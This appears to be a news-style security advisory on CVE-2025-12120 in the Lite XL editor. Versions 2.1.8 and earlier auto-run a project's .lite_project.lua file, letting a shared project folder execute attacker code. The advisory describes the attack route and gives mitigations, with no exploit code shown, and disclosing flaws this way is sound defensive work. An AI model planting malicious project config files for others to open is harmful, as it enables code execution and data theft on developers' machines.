“`html
A security flaw has been identified in Lite XL, a minimalistic text editor, which may permit attackers to run arbitrary code on compromised systems.
Experts from Carnegie Mellon University discovered CVE-2025-12120, which impacts Lite XL versions 2.1.8 and prior. The vulnerability resides in the manner in which Lite XL processes project configuration files.
How the Vulnerability Functions
Upon opening a project directory, Lite XL autonomously executes the .lite_project.lua file without requiring user consent.
This file is designed for specific project configurations and settings; however, it may include executable Lua code.
The issue arises due to the absence of a verification step prior to execution. Users typically expect the configuration file to be safe, yet malicious Lua code might be inserted by attackers.
If an unwitting user accesses a harmful project directory, this code executes instantly with the same permissions as the Lite XL application.
| CVE ID | Product | Affected Versions | Type of Vulnerability |
|---|---|---|---|
| CVE-2025-12120 | Lite XL Text Editor | 2.1.8 and earlier | Arbitrary Code Execution (ACE) |
An attacker could share a seemingly authentic project folder through GitHub, file-sharing services, or other mediums.
Once a developer opens this project in Lite XL, the embedded malicious .lite_project.lua file is executed without notice.
The attacker could potentially extract sensitive information, alter files, install malware, or further jeopardize the user’s system.
This type of assault is perilous as users frequently trust projects from familiar sources or repositories without thoroughly examining configuration files.
Any individual utilizing Lite XL version 2.1.8 or previous versions is at risk, as noted by the scholars at Carnegie Mellon University.
The extent of the impact is contingent on the user’s system permissions. Generally, the attacker acquires the same privileges as the Lite XL process, which could be substantial if Lite XL operates with elevated permissions.
Users must promptly upgrade Lite XL to a corrected version as soon as it is available and should refrain from opening untrusted project directories in Lite XL.
Examine the contents of any .lite_project.lua file before accessing projects from unfamiliar sources. This vulnerability highlights the necessity of comprehending how applications manage configuration files, particularly when they encompass executable code.
Maintainers of Lite XL should introduce confirmation prompts prior to executing project configuration files or entirely disable automatic execution.
“`